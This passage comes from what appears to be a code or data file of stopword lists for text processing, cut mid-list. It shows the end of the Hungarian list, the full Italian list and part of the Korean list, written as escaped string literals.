\"se\",\n        \"sem\",\n        \"semmi\",\n        \"semmilyen\",\n        \"semmiség\",\n        \"senki\",\n        \"soha\",\n        \"sok\",\n        \"sokan\",\n        \"sokat\",\n        \"sokkal\",\n        \"sokszor\",\n        \"sokáig\",\n        \"során\",\n        \"stb.\",\n        \"szemben\",\n        \"szerbusz\",\n        \"szerint\",\n        \"szerinte\",\n        \"szerinted\",\n        \"szerintem\",\n        \"szerintetek\",\n        \"szerintük\",\n        \"szerintünk\",\n        \"szervusz\",\n        \"szinte\",\n        \"számára\",\n        \"száz\",\n        \"századik\",\n        \"százat\",\n        \"szépen\",\n        \"szét\",\n        \"szíves\",\n        \"szívesen\",\n        \"szíveskedjék\",\n        \"sőt\",\n        \"talán\",\n        \"tavaly\",\n        \"te\",\n        \"tegnap\",\n        \"tegnapelőtt\",\n        \"tehát\",\n        \"tele\",\n        \"teljes\",\n        \"tessék\",\n        
\"ti\",\n        \"tied\",\n        \"titeket\",\n        \"tizedik\",\n        \"tizediket\",\n        \"tizenegy\",\n        \"tizenegyedik\",\n        \"tizenhat\",\n        \"tizenhárom\",\n        \"tizenhét\",\n        \"tizenkettedik\",\n        \"tizenkettő\",\n        \"tizenkilenc\",\n        \"tizenkét\",\n        \"tizennyolc\",\n        \"tizennégy\",\n        \"tizenöt\",\n        \"tizet\",\n        \"tovább\",\n        \"további\",\n        \"továbbá\",\n        \"távol\",\n        \"téged\",\n        \"tényleg\",\n        \"tíz\",\n        \"több\",\n        \"többi\",\n        \"többször\",\n        \"túl\",\n        \"tőle\",\n        \"tőled\",\n        \"tőlem\",\n        \"tőletek\",\n        \"tőlük\",\n        \"tőlünk\",\n        \"ugyanakkor\",\n        \"ugyanez\",\n        \"ugyanis\",\n        \"ugye\",\n        \"urak\",\n        \"uram\",\n        \"urat\",\n        \"utoljára\",\n        \"utolsó\",\n        \"után\",\n        \"utána\",\n        \"vagy\",\n        \"vagyis\",\n        \"vagyok\",\n        \"vagytok\",\n        \"vagyunk\",\n        \"vajon\",\n        \"valahol\",\n        \"valaki\",\n        \"valakit\",\n        \"valamelyik\",\n        \"valami\",\n        \"valamint\",\n        \"való\",\n        \"van\",\n        \"vannak\",\n        \"vele\",\n        \"veled\",\n        \"velem\",\n        \"veletek\",\n        \"velük\",\n        \"velünk\",\n        \"vissza\",\n        \"viszlát\",\n        \"viszont\",\n        \"viszontlátásra\",\n        \"volna\",\n        \"volnának\",\n        \"volnék\",\n        \"volt\",\n        \"voltak\",\n        \"voltam\",\n        \"voltunk\",\n        \"végre\",\n        \"végén\",\n        \"végül\",\n        \"által\",\n        \"általában\",\n        \"ám\",\n        \"át\",\n        \"éljen\",\n        \"én\",\n        \"éppen\",\n        \"érte\",\n        \"érted\",\n        \"értem\",\n        \"értetek\",\n        \"értük\",\n        \"értünk\",\n        \"és\",\n 
       \"év\",\n        \"évben\",\n        \"éve\",\n        \"évek\",\n        \"éves\",\n        \"évi\",\n        \"évvel\",\n        \"így\",\n        \"óta\",\n        \"ön\",\n        \"önbe\",\n        \"önben\",\n        \"önből\",\n        \"önhöz\",\n        \"önnek\",\n        \"önnel\",\n        \"önnél\",\n        \"önre\",\n        \"önről\",\n        \"önt\",\n        \"öntől\",\n        \"önért\",\n        \"önök\",\n        \"önökbe\",\n        \"önökben\",\n        \"önökből\",\n        \"önöket\",\n        \"önökhöz\",\n        \"önökkel\",\n        \"önöknek\",\n        \"önöknél\",\n        \"önökre\",\n        \"önökről\",\n        \"önöktől\",\n        \"önökért\",\n        \"önökön\",\n        \"önön\",\n        \"össze\",\n        \"öt\",\n        \"ötven\",\n        \"ötödik\",\n        \"ötödiket\",\n        \"ötöt\",\n        \"úgy\",\n        \"úgyis\",\n        \"úgynevezett\",\n        \"új\",\n        \"újabb\",\n        \"újra\",\n        \"úr\",\n        \"ő\",\n        \"ők\",\n        \"őket\",\n        \"őt\",\n    ],\n    \"it\": [\n        \"IE\",\n        \"a\",\n        \"abbastanza\",\n        \"abbia\",\n        \"abbiamo\",\n        \"abbiano\",\n        \"abbiate\",\n        \"accidenti\",\n        \"ad\",\n        \"adesso\",\n        \"affinche\",\n        \"agl\",\n        \"agli\",\n        \"ahime\",\n        \"ahimè\",\n        \"ai\",\n        \"al\",\n        \"alcuna\",\n        \"alcuni\",\n        \"alcuno\",\n        \"all\",\n        \"alla\",\n        \"alle\",\n        \"allo\",\n        \"allora\",\n        \"altri\",\n        \"altrimenti\",\n        \"altro\",\n        \"altrove\",\n        \"altrui\",\n        \"anche\",\n        \"ancora\",\n        \"anni\",\n        \"anno\",\n        \"ansa\",\n        \"anticipo\",\n        \"assai\",\n        \"attesa\",\n        \"attraverso\",\n        \"avanti\",\n        \"avemmo\",\n        \"avendo\",\n        \"avente\",\n        \"aver\",\n        
\"avere\",\n        \"averlo\",\n        \"avesse\",\n        \"avessero\",\n        \"avessi\",\n        \"avessimo\",\n        \"aveste\",\n        \"avesti\",\n        \"avete\",\n        \"aveva\",\n        \"avevamo\",\n        \"avevano\",\n        \"avevate\",\n        \"avevi\",\n        \"avevo\",\n        \"avrai\",\n        \"avranno\",\n        \"avrebbe\",\n        \"avrebbero\",\n        \"avrei\",\n        \"avremmo\",\n        \"avremo\",\n        \"avreste\",\n        \"avresti\",\n        \"avrete\",\n        \"avrà\",\n        \"avrò\",\n        \"avuta\",\n        \"avute\",\n        \"avuti\",\n        \"avuto\",\n        \"basta\",\n        \"bene\",\n        \"benissimo\",\n        \"berlusconi\",\n        \"brava\",\n        \"bravo\",\n        \"c\",\n        \"casa\",\n        \"caso\",\n        \"cento\",\n        \"certa\",\n        \"certe\",\n        \"certi\",\n        \"certo\",\n        \"che\",\n        \"chi\",\n        \"chicchessia\",\n        \"chiunque\",\n        \"ci\",\n        \"ciascuna\",\n        \"ciascuno\",\n        \"cima\",\n        \"cio\",\n        \"cioe\",\n        \"cioè\",\n        \"circa\",\n        \"citta\",\n        \"città\",\n        \"ciò\",\n        \"co\",\n        \"codesta\",\n        \"codesti\",\n        \"codesto\",\n        \"cogli\",\n        \"coi\",\n        \"col\",\n        \"colei\",\n        \"coll\",\n        \"coloro\",\n        \"colui\",\n        \"come\",\n        \"cominci\",\n        \"comunque\",\n        \"con\",\n        \"concernente\",\n        \"conciliarsi\",\n        \"conclusione\",\n        \"consiglio\",\n        \"contro\",\n        \"cortesia\",\n        \"cos\",\n        \"cosa\",\n        \"cosi\",\n        \"così\",\n        \"cui\",\n        \"d\",\n        \"da\",\n        \"dagl\",\n        \"dagli\",\n        \"dai\",\n        \"dal\",\n        \"dall\",\n        \"dalla\",\n        \"dalle\",\n        \"dallo\",\n        \"dappertutto\",\n        
\"davanti\",\n        \"degl\",\n        \"degli\",\n        \"dei\",\n        \"del\",\n        \"dell\",\n        \"della\",\n        \"delle\",\n        \"dello\",\n        \"dentro\",\n        \"detto\",\n        \"deve\",\n        \"di\",\n        \"dice\",\n        \"dietro\",\n        \"dire\",\n        \"dirimpetto\",\n        \"diventa\",\n        \"diventare\",\n        \"diventato\",\n        \"dopo\",\n        \"dov\",\n        \"dove\",\n        \"dovra\",\n        \"dovrà\",\n        \"dovunque\",\n        \"due\",\n        \"dunque\",\n        \"durante\",\n        \"e\",\n        \"ebbe\",\n        \"ebbero\",\n        \"ebbi\",\n        \"ecc\",\n        \"ecco\",\n        \"ed\",\n        \"effettivamente\",\n        \"egli\",\n        \"ella\",\n        \"entrambi\",\n        \"eppure\",\n        \"era\",\n        \"erano\",\n        \"eravamo\",\n        \"eravate\",\n        \"eri\",\n        \"ero\",\n        \"esempio\",\n        \"esse\",\n        \"essendo\",\n        \"esser\",\n        \"essere\",\n        \"essi\",\n        \"ex\",\n        \"fa\",\n        \"faccia\",\n        \"facciamo\",\n        \"facciano\",\n        \"facciate\",\n        \"faccio\",\n        \"facemmo\",\n        \"facendo\",\n        \"facesse\",\n        \"facessero\",\n        \"facessi\",\n        \"facessimo\",\n        \"faceste\",\n        \"facesti\",\n        \"faceva\",\n        \"facevamo\",\n        \"facevano\",\n        \"facevate\",\n        \"facevi\",\n        \"facevo\",\n        \"fai\",\n        \"fanno\",\n        \"farai\",\n        \"faranno\",\n        \"fare\",\n        \"farebbe\",\n        \"farebbero\",\n        \"farei\",\n        \"faremmo\",\n        \"faremo\",\n        \"fareste\",\n        \"faresti\",\n        \"farete\",\n        \"farà\",\n        \"farò\",\n        \"fatto\",\n        \"favore\",\n        \"fece\",\n        \"fecero\",\n        \"feci\",\n        \"fin\",\n        \"finalmente\",\n        \"finche\",\n        
\"fine\",\n        \"fino\",\n        \"forse\",\n        \"forza\",\n        \"fosse\",\n        \"fossero\",\n        \"fossi\",\n        \"fossimo\",\n        \"foste\",\n        \"fosti\",\n        \"fra\",\n        \"frattempo\",\n        \"fu\",\n        \"fui\",\n        \"fummo\",\n        \"fuori\",\n        \"furono\",\n        \"futuro\",\n        \"generale\",\n        \"gia\",\n        \"giacche\",\n        \"giorni\",\n        \"giorno\",\n        \"già\",\n        \"gli\",\n        \"gliela\",\n        \"gliele\",\n        \"glieli\",\n        \"glielo\",\n        \"gliene\",\n        \"governo\",\n        \"grande\",\n        \"grazie\",\n        \"gruppo\",\n        \"ha\",\n        \"haha\",\n        \"hai\",\n        \"hanno\",\n        \"ho\",\n        \"i\",\n        \"ieri\",\n        \"il\",\n        \"improvviso\",\n        \"in\",\n        \"inc\",\n        \"infatti\",\n        \"inoltre\",\n        \"insieme\",\n        \"intanto\",\n        \"intorno\",\n        \"invece\",\n        \"io\",\n        \"l\",\n        \"la\",\n        \"lasciato\",\n        \"lato\",\n        \"lavoro\",\n        \"le\",\n        \"lei\",\n        \"li\",\n        \"lo\",\n        \"lontano\",\n        \"loro\",\n        \"lui\",\n        \"lungo\",\n        \"luogo\",\n        \"là\",\n        \"ma\",\n        \"macche\",\n        \"magari\",\n        \"maggior\",\n        \"mai\",\n        \"male\",\n        \"malgrado\",\n        \"malissimo\",\n        \"mancanza\",\n        \"marche\",\n        \"me\",\n        \"medesimo\",\n        \"mediante\",\n        \"meglio\",\n        \"meno\",\n        \"mentre\",\n        \"mesi\",\n        \"mezzo\",\n        \"mi\",\n        \"mia\",\n        \"mie\",\n        \"miei\",\n        \"mila\",\n        \"miliardi\",\n        \"milioni\",\n        \"minimi\",\n        \"ministro\",\n        \"mio\",\n        \"modo\",\n        \"molti\",\n        \"moltissimo\",\n        \"molto\",\n        \"momento\",\n        
\"mondo\",\n        \"mosto\",\n        \"nazionale\",\n        \"ne\",\n        \"negl\",\n        \"negli\",\n        \"nei\",\n        \"nel\",\n        \"nell\",\n        \"nella\",\n        \"nelle\",\n        \"nello\",\n        \"nemmeno\",\n        \"neppure\",\n        \"nessun\",\n        \"nessuna\",\n        \"nessuno\",\n        \"niente\",\n        \"no\",\n        \"noi\",\n        \"non\",\n        \"nondimeno\",\n        \"nonostante\",\n        \"nonsia\",\n        \"nostra\",\n        \"nostre\",\n        \"nostri\",\n        \"nostro\",\n        \"novanta\",\n        \"nove\",\n        \"nulla\",\n        \"nuovo\",\n        \"o\",\n        \"od\",\n        \"oggi\",\n        \"ogni\",\n        \"ognuna\",\n        \"ognuno\",\n        \"oltre\",\n        \"oppure\",\n        \"ora\",\n        \"ore\",\n        \"osi\",\n        \"ossia\",\n        \"ottanta\",\n        \"otto\",\n        \"paese\",\n        \"parecchi\",\n        \"parecchie\",\n        \"parecchio\",\n        \"parte\",\n        \"partendo\",\n        \"peccato\",\n        \"peggio\",\n        \"per\",\n        \"perche\",\n        \"perchè\",\n        \"perché\",\n        \"percio\",\n        \"perciò\",\n        \"perfino\",\n        \"pero\",\n        \"persino\",\n        \"persone\",\n        \"però\",\n        \"piedi\",\n        \"pieno\",\n        \"piglia\",\n        \"piu\",\n        \"piuttosto\",\n        \"più\",\n        \"po\",\n        \"pochissimo\",\n        \"poco\",\n        \"poi\",\n        \"poiche\",\n        \"possa\",\n        \"possedere\",\n        \"posteriore\",\n        \"posto\",\n        \"potrebbe\",\n        \"preferibilmente\",\n        \"presa\",\n        \"press\",\n        \"prima\",\n        \"primo\",\n        \"principalmente\",\n        \"probabilmente\",\n        \"proprio\",\n        \"puo\",\n        \"pure\",\n        \"purtroppo\",\n        \"può\",\n        \"qualche\",\n        \"qualcosa\",\n        \"qualcuna\",\n        
\"qualcuno\",\n        \"quale\",\n        \"quali\",\n        \"qualunque\",\n        \"quando\",\n        \"quanta\",\n        \"quante\",\n        \"quanti\",\n        \"quanto\",\n        \"quantunque\",\n        \"quasi\",\n        \"quattro\",\n        \"quel\",\n        \"quella\",\n        \"quelle\",\n        \"quelli\",\n        \"quello\",\n        \"quest\",\n        \"questa\",\n        \"queste\",\n        \"questi\",\n        \"questo\",\n        \"qui\",\n        \"quindi\",\n        \"realmente\",\n        \"recente\",\n        \"recentemente\",\n        \"registrazione\",\n        \"relativo\",\n        \"riecco\",\n        \"salvo\",\n        \"sara\",\n        \"sarai\",\n        \"saranno\",\n        \"sarebbe\",\n        \"sarebbero\",\n        \"sarei\",\n        \"saremmo\",\n        \"saremo\",\n        \"sareste\",\n        \"saresti\",\n        \"sarete\",\n        \"sarà\",\n        \"sarò\",\n        \"scola\",\n        \"scopo\",\n        \"scorso\",\n        \"se\",\n        \"secondo\",\n        \"seguente\",\n        \"seguito\",\n        \"sei\",\n        \"sembra\",\n        \"sembrare\",\n        \"sembrato\",\n        \"sembri\",\n        \"sempre\",\n        \"senza\",\n        \"sette\",\n        \"si\",\n        \"sia\",\n        \"siamo\",\n        \"siano\",\n        \"siate\",\n        \"siete\",\n        \"sig\",\n        \"solito\",\n        \"solo\",\n        \"soltanto\",\n        \"sono\",\n        \"sopra\",\n        \"sotto\",\n        \"spesso\",\n        \"srl\",\n        \"sta\",\n        \"stai\",\n        \"stando\",\n        \"stanno\",\n        \"starai\",\n        \"staranno\",\n        \"starebbe\",\n        \"starebbero\",\n        \"starei\",\n        \"staremmo\",\n        \"staremo\",\n        \"stareste\",\n        \"staresti\",\n        \"starete\",\n        \"starà\",\n        \"starò\",\n        \"stata\",\n        \"state\",\n        \"stati\",\n        \"stato\",\n        \"stava\",\n        
\"stavamo\",\n        \"stavano\",\n        \"stavate\",\n        \"stavi\",\n        \"stavo\",\n        \"stemmo\",\n        \"stessa\",\n        \"stesse\",\n        \"stessero\",\n        \"stessi\",\n        \"stessimo\",\n        \"stesso\",\n        \"steste\",\n        \"stesti\",\n        \"stette\",\n        \"stettero\",\n        \"stetti\",\n        \"stia\",\n        \"stiamo\",\n        \"stiano\",\n        \"stiate\",\n        \"sto\",\n        \"su\",\n        \"sua\",\n        \"subito\",\n        \"successivamente\",\n        \"successivo\",\n        \"sue\",\n        \"sugl\",\n        \"sugli\",\n        \"sui\",\n        \"sul\",\n        \"sull\",\n        \"sulla\",\n        \"sulle\",\n        \"sullo\",\n        \"suo\",\n        \"suoi\",\n        \"tale\",\n        \"tali\",\n        \"talvolta\",\n        \"tanto\",\n        \"te\",\n        \"tempo\",\n        \"ti\",\n        \"titolo\",\n        \"torino\",\n        \"tra\",\n        \"tranne\",\n        \"tre\",\n        \"trenta\",\n        \"troppo\",\n        \"trovato\",\n        \"tu\",\n        \"tua\",\n        \"tue\",\n        \"tuo\",\n        \"tuoi\",\n        \"tutta\",\n        \"tuttavia\",\n        \"tutte\",\n        \"tutti\",\n        \"tutto\",\n        \"uguali\",\n        \"ulteriore\",\n        \"ultimo\",\n        \"un\",\n        \"una\",\n        \"uno\",\n        \"uomo\",\n        \"va\",\n        \"vale\",\n        \"vari\",\n        \"varia\",\n        \"varie\",\n        \"vario\",\n        \"verso\",\n        \"vi\",\n        \"via\",\n        \"vicino\",\n        \"visto\",\n        \"vita\",\n        \"voi\",\n        \"volta\",\n        \"volte\",\n        \"vostra\",\n        \"vostre\",\n        \"vostri\",\n        \"vostro\",\n        \"è\",\n    ],\n    \"ko\": [\n        \"!\",\n        '\"',\n        \"$\",\n        \"%\",\n        \"&\",\n        \"'\",\n        \"(\",\n        \")\",\n        \"*\",\n        \"+\",\n        \",\",\n        
\"-\",\n        \".\",\n        \"...\",\n        \"0\",\n        \"1\",\n        \"2\",\n        \"3\",\n        \"4\",\n        \"5\",\n        \"6\",\n        \"7\",\n        \"8\",\n        \"9\",\n        \";\",\n        \"<\",\n        \"=\",\n        \">\",\n        \"?\",\n        \"@\",\n        \"\\\\\",\n        \"^\",\n        \"_\",\n        \"`\",\n        \"|\",\n        \"~\",\n        \"·\",\n        \"—\",\n        \"——\",\n        \"‘\",\n        \"’\",\n        \"“\",\n        \"”\",\n        \"…\",\n        \"、\",\n        \"。\",\n        \"〈\",\n        \"〉\",\n        \"《\",\n        \"》\",\n        \"가\",\n        \"가까스로\",\n        \"가령\",\n        \"각\",\n        \"각각\",\n        \"각자\",\n        \"각종\",\n        \"갖고말하자면\",\n        \"같다\",\n        \"같이\",\n        \"개의치않고\",\n        \"거니와\",\n        \"거바\",\n        \"거의\",\n        \"것\",\n        \"것과 같이\",\n        \"것들\",\n        \"게다가\",\n        \"게우다\",\n        \"겨우\",\n        \"견지에서\",\n        \"결과에 이르다\",\n        \"결국\",\n        \"결론을 낼 수 있다\",\n        \"겸사겸사\",\n        \"고려하면\",\n        \"고로\",\n        \"곧\",\n        \"공동으로\",\n        \"과\",\n        \"과연\",\n        \"관계가 있다\",\n        \"관계없이\",\n        \"관련이 있다\",\n        \"관하여\",\n        \"관한\",\n        \"관해서는\",\n        \"구\",\n        \"구체적으로\",\n        \"구토하다\",\n        \"그\",\n        \"그들\",\n        \"그때\",\n        \"그래\",\n        \"그래도\",\n        \"그래서\",\n        \"그러나\",\n        \"그러니\",\n        \"그러니까\",\n        \"그러면\",\n        \"그러므로\",\n        \"그러한즉\",\n        \"그런 까닭에\",\n        \"그런데\",\n        \"그런즉\",\n        \"그럼\",\n        \"그럼에도 불구하고\",\n        \"그렇게 함으로써\",\n        \"그렇지\",\n        \"그렇지 않다면\",\n        \"그렇지 않으면\",\n        \"그렇지만\",\n        \"그렇지않으면\",\n        \"그리고\",\n        \"그리하여\",\n        \"그만이다\",\n        \"그에 따르는\",\n        \"그위에\",\n        \"그저\",\n        \"그중에서\",\n        \"그치지 않다\",\n        \"근거로\",\n        \"근거하여\",\n        \"기대여\",\n      
  \"기점으로\",\n        \"기준으로\",\n        \"기타\",\n        \"까닭으로\",\n        \"까악\",\n        \"까지\",\n        \"까지 미치다\",\n        \"까지도\",\n        \"꽈당\",\n        \"끙끙\",\n        \"끼익\",\n        \"나\",\n        \"나머지는\",\n        \"남들\",\n        \"남짓\",\n        \"너\",\n        \"너희\",\n        \"너희들\",\n        \"네\",\n        \"넷\",\n        \"년\",\n        \"논하지 않다\",\n        \"놀라다\",\n        \"누가 알겠는가\",\n        \"누구\",\n        \"다른\",\n        \"다른 방면으로\",\n        \"다만\",\n        \"다섯\",\n        \"다소\",\n        \"다수\",\n        \"다시 말하자면\",\n        \"다시말하면\",\n        \"다음\",\n        \"다음에\",\n        \"다음으로\",\n        \"단지\",\n        \"답다\",\n        \"당신\",\n        \"당장\",\n        \"대로 하다\",\n        \"대하면\",\n        \"대하여\",\n        \"대해 말하자면\",\n        \"대해서\",\n        \"댕그\",\n        \"더구나\",\n        \"더군다나\",\n        \"더라도\",\n        \"더불어\",\n        \"더욱더\",\n        \"더욱이는\",\n        \"도달하다\",\n        \"도착하다\",\n        \"동시에\",\n        \"동안\",\n        \"된바에야\",\n        \"된이상\",\n        \"두번째로\",\n        \"둘\",\n        \"둥둥\",\n        \"뒤따라\",\n        \"뒤이어\",\n        \"든간에\",\n        \"들\",\n        \"등\",\n        \"등등\",\n        \"딩동\",\n        \"따라\",\n        \"따라서\",\n        \"따위\",\n        \"따지지 않다\",\n        \"딱\",\n        \"때\",\n        \"때가 되어\",\n        \"때문에\",\n        \"또\",\n        \"또한\",\n        \"뚝뚝\",\n        \"라 해도\",\n        \"령\",\n        \"로\",\n        \"로 인하여\",\n        \"로부터\",\n        \"로써\",\n        \"륙\",\n        \"를\",\n        \"마음대로\",\n        \"마저\",\n        \"마저도\",\n        \"마치\",\n        \"막론하고\",\n        \"만 못하다\",\n        \"만약\",\n        \"만약에\",\n        \"만은 아니다\",\n        \"만이 아니다\",\n        \"만일\",\n        \"만큼\",\n        \"말하자면\",\n        \"말할것도 없고\",\n        \"매\",\n        \"매번\",\n        \"메쓰겁다\",\n        \"몇\",\n        \"모\",\n        \"모두\",\n        \"무렵\",\n        \"무릎쓰고\",\n        \"무슨\",\n        \"무엇\",\n        \"무엇때문에\",\n  
      \"물론\",\n        \"및\",\n        \"바꾸어말하면\",\n        \"바꾸어말하자면\",\n        \"바꾸어서 말하면\",\n        \"바꾸어서 한다면\",\n        \"바꿔 말하면\",\n        \"바로\",\n        \"바와같이\",\n        \"밖에 안된다\",\n        \"반대로\",\n        \"반대로 말하자면\",\n        \"반드시\",\n        \"버금\",\n        \"보는데서\",\n        \"보다더\",\n        \"보드득\",\n        \"본대로\",\n        \"봐\",\n        \"봐라\",\n        \"부류의 사람들\",\n        \"부터\",\n        \"불구하고\",\n        \"불문하고\",\n        \"붕붕\",\n        \"비걱거리다\",\n        \"비교적\",\n        \"비길수 없다\",\n        \"비로소\",\n        \"비록\",\n        \"비슷하다\",\n        \"비추어 보아\",\n        \"비하면\",\n        \"뿐만 아니라\",\n        \"뿐만아니라\",\n        \"뿐이다\",\n        \"삐걱\",\n        \"삐걱거리다\",\n        \"사\",\n        \"삼\",\n        \"상대적으로 말하자면\",\n        \"생각한대로\",\n        \"설령\",\n        \"설마\",\n        \"설사\",\n        \"셋\",\n        \"소생\",\n        \"소인\",\n        \"솨\",\n        \"쉿\",\n        \"습니까\",\n        \"습니다\",\n        \"시각\",\n        \"시간\",\n        \"시작하여\",\n        \"시초에\",\n        \"시키다\",\n        \"실로\",\n        \"심지어\",\n        \"아\",\n        \"아니\",\n        \"아니나다를가\",\n        \"아니라면\",\n        \"아니면\",\n        \"아니었다면\",\n        \"아래윗\",\n        \"아무거나\",\n        \"아무도\",\n        \"아야\",\n        \"아울러\",\n        \"아이\",\n        \"아이고\",\n        \"아이구\",\n        \"아이야\",\n        \"아이쿠\",\n        \"아하\",\n        \"아홉\",\n        \"안 그러면\",\n        \"않기 위하여\",\n        \"않기 위해서\",\n        \"알 수 있다\",\n        \"알았어\",\n        \"앗\",\n        \"앞에서\",\n        \"앞의것\",\n        \"야\",\n        \"약간\",\n        \"양자\",\n        \"어\",\n        \"어기여차\",\n        \"어느\",\n        \"어느 년도\",\n        \"어느것\",\n        \"어느곳\",\n        \"어느때\",\n        \"어느쪽\",\n        \"어느해\",\n        \"어디\",\n        \"어때\",\n        \"어떠한\",\n        \"어떤\",\n        \"어떤것\",\n        \"어떤것들\",\n        \"어떻게\",\n        \"어떻해\",\n        \"어이\",\n        \"어째서\",\n        \"어쨋든\",\n        \"어쩔수 없다\",\n   
     \"어찌\",\n        \"어찌됏든\",\n        \"어찌됏어\",\n        \"어찌하든지\",\n        \"어찌하여\",\n        \"언제\",\n        \"언젠가\",\n        \"얼마\",\n        \"얼마 안 되는 것\",\n        \"얼마간\",\n        \"얼마나\",\n        \"얼마든지\",\n        \"얼마만큼\",\n        \"얼마큼\",\n        \"엉엉\",\n        \"에\",\n        \"에 가서\",\n        \"에 달려 있다\",\n        \"에 대해\",\n        \"에 있다\",\n        \"에 한하다\",\n        \"에게\",\n        \"에서\",\n        \"여\",\n        \"여기\",\n        \"여덟\",\n        \"여러분\",\n        \"여보시오\",\n        \"여부\",\n        \"여섯\",\n        \"여전히\",\n        \"여차\",\n        \"연관되다\",\n        \"연이서\",\n        \"영\",\n        \"영차\",\n        \"옆사람\",\n        \"예\",\n        \"예를 들면\",\n        \"예를 들자면\",\n        \"예컨대\",\n        \"예하면\",\n        \"오\",\n        \"오로지\",\n        \"오르다\",\n        \"오자마자\",\n        \"오직\",\n        \"오호\",\n        \"오히려\",\n        \"와\",\n        \"와 같은 사람들\",\n        \"와르르\",\n        \"와아\",\n        \"왜\",\n        \"왜냐하면\",\n        \"외에도\",\n        \"요만큼\",\n        \"요만한 것\",\n        \"요만한걸\",\n        \"요컨대\",\n        \"우르르\",\n        \"우리\",\n        \"우리들\",\n        \"우선\",\n        \"우에 종합한것과같이\",\n        \"운운\",\n        \"월\",\n        \"위에서 서술한바와같이\",\n        \"위하여\",\n        \"위해서\",\n        \"윙윙\",\n        \"육\",\n        \"으로\",\n        \"으로 인하여\",\n        \"으로서\",\n        \"으로써\",\n        \"을\",\n        \"응\",\n        \"응당\",\n        \"의\",\n        \"의거하여\",\n        \"의지하여\",\n        \"의해\",\n        \"의해되다\",\n        \"의해서\",\n        \"이\",\n        \"이 되다\",\n        \"이 때문에\",\n        \"이 밖에\",\n        \"이 외에\",\n        \"이 정도의\",\n        \"이것\",\n        \"이곳\",\n        \"이때\",\n        \"이라면\",\n        \"이래\",\n        \"이러이러하다\",\n        \"이러한\",\n        \"이런\",\n        \"이럴정도로\",\n        \"이렇게 많은 것\",\n        \"이렇게되면\",\n        \"이렇게말하자면\",\n        \"이렇구나\",\n        \"이로 인하여\",\n        \"이르기까지\",\n        \"이리하여\",\n        \"이만큼\",\n        \"이번\",\n     
   \"이봐\",\n        \"이상\",\n        \"이어서\",\n        \"이었다\",\n        \"이와 같다\",\n        \"이와 같은\",\n        \"이와 반대로\",\n        \"이와같다면\",\n        \"이외에도\",\n        \"이용하여\",\n        \"이유만으로\",\n        \"이젠\",\n        \"이지만\",\n        \"이쪽\",\n        \"이천구\",\n        \"이천육\",\n        \"이천칠\",\n        \"이천팔\",\n        \"인 듯하다\",\n        \"인젠\",\n        \"일\",\n        \"일것이다\",\n        \"일곱\",\n        \"일단\",\n        \"일때\",\n        \"일반적으로\",\n        \"일지라도\",\n        \"임에 틀림없다\",\n        \"입각하여\",\n        \"입장에서\",\n        \"잇따라\",\n        \"있다\",\n        \"자\",\n        \"자기\",\n        \"자기집\",\n        \"자마자\",\n        \"자신\",\n        \"잠깐\",\n        \"잠시\",\n        \"저\",\n        \"저것\",\n        \"저것만큼\",\n        \"저기\",\n        \"저쪽\",\n        \"저희\",\n        \"전부\",\n        \"전자\",\n        \"전후\",\n        \"점에서 보아\",\n        \"정도에 이르다\",\n        \"제\",\n        \"제각기\",\n        \"제외하고\",\n        \"조금\",\n        \"조차\",\n        \"조차도\",\n        \"졸졸\",\n        \"좀\",\n        \"좋아\",\n        \"좍좍\",\n        \"주룩주룩\",\n        \"주저하지 않고\",\n        \"줄은 몰랏다\",\n        \"줄은모른다\",\n        \"중에서\",\n        \"중의하나\",\n        \"즈음하여\",\n        \"즉\",\n        \"즉시\",\n        \"지든지\",\n        \"지만\",\n        \"지말고\",\n        \"진짜로\",\n        \"쪽으로\",\n        \"차라리\",\n        \"참\",\n        \"참나\",\n        \"첫번째로\",\n        \"쳇\",\n        \"총적으로\",\n        \"총적으로 말하면\",\n        \"총적으로 보면\",\n        \"칠\",\n        \"콸콸\",\n        \"쾅쾅\",\n        \"쿵\",\n        \"타다\",\n        \"타인\",\n        \"탕탕\",\n        \"토하다\",\n        \"통하여\",\n        \"툭\",\n        \"퉤\",\n        \"틈타\",\n        \"팍\",\n        \"팔\",\n        \"퍽\",\n        \"펄렁\",\n        \"하\",\n        \"하게될것이다\",\n        \"하게하다\",\n        \"하겠는가\",\n        \"하고 있다\",\n        \"하고있었다\",\n        \"하곤하였다\",\n        \"하구나\",\n        \"하기 때문에\",\n        \"하기 위하여\",\n        \"하기는한데\",\n        \"하기만 하면\",\n        
\"하기보다는\",\n        \"하기에\",\n        \"하나\",\n        \"하느니\",\n        \"하는 김에\",\n        \"하는 편이 낫다\",\n        \"하는것도\",\n        \"하는것만 못하다\",\n        \"하는것이 낫다\",\n        \"하는바\",\n        \"하더라도\",\n        \"하도다\",\n        \"하도록시키다\",\n        \"하도록하다\",\n        \"하든지\",\n        \"하려고하다\",\n        \"하마터면\",\n        \"하면 할수록\",\n        \"하면된다\",\n        \"하면서\",\n        \"하물며\",\n        \"하여금\",\n        \"하여야\",\n        \"하자마자\",\n        \"하지 않는다면\",\n        \"하지 않도록\",\n        \"하지마\",\n        \"하지마라\",\n        \"하지만\",\n        \"하하\",\n        \"한 까닭에\",\n        \"한 이유는\",\n        \"한 후\",\n        \"한다면\",\n        \"한다면 몰라도\",\n        \"한데\",\n        \"한마디\",\n        \"한적이있다\",\n        \"한켠으로는\",\n        \"한항목\",\n        \"할 따름이다\",\n        \"할 생각이다\",\n        \"할 줄 안다\",\n        \"할 지경이다\",\n        \"할 힘이 있다\",\n        \"할때\",\n        \"할만하다\",\n        \"할망정\",\n        \"할뿐\",\n        \"할수있다\",\n        \"할수있어\",\n        \"할줄알다\",\n        \"할지라도\",\n        \"할지언정\",\n        \"함께\",\n        \"해도된다\",\n        \"해도좋다\",\n        \"해봐요\",\n        \"해서는 안된다\",\n        \"해야한다\",\n        \"해요\",\n        \"했어요\",\n        \"향하다\",\n        \"향하여\",\n        \"향해서\",\n        \"허\",\n        \"허걱\",\n        \"허허\",\n        \"헉\",\n        \"헉헉\",\n        \"헐떡헐떡\",\n        \"형식으로 쓰여\",\n        \"혹시\",\n        \"혹은\",\n        \"혼자\",\n        \"훨씬\",\n        \"휘익\",\n        \"휴\",\n        \"흐흐\",\n        \"흥\",\n        \"힘입어\",\n        \"︿\",\n        \"！\",\n        \"＃\",\n        \"＄\",\n        \"％\",\n        \"＆\",\n        \"（\",\n        \"）\",\n        \"＊\",\n        \"＋\",\n        \"，\",\n        \"０\",\n        \"１\",\n        \"２\",\n        \"３\",\n        \"４\",\n        \"５\",\n        \"６\",\n        \"７\",\n        \"８\",\n        \"９\",\n        \"：\",\n        \"；\",\n        \"＜\",\n        \"＞\",\n        \"？\",\n        \"＠\",\n        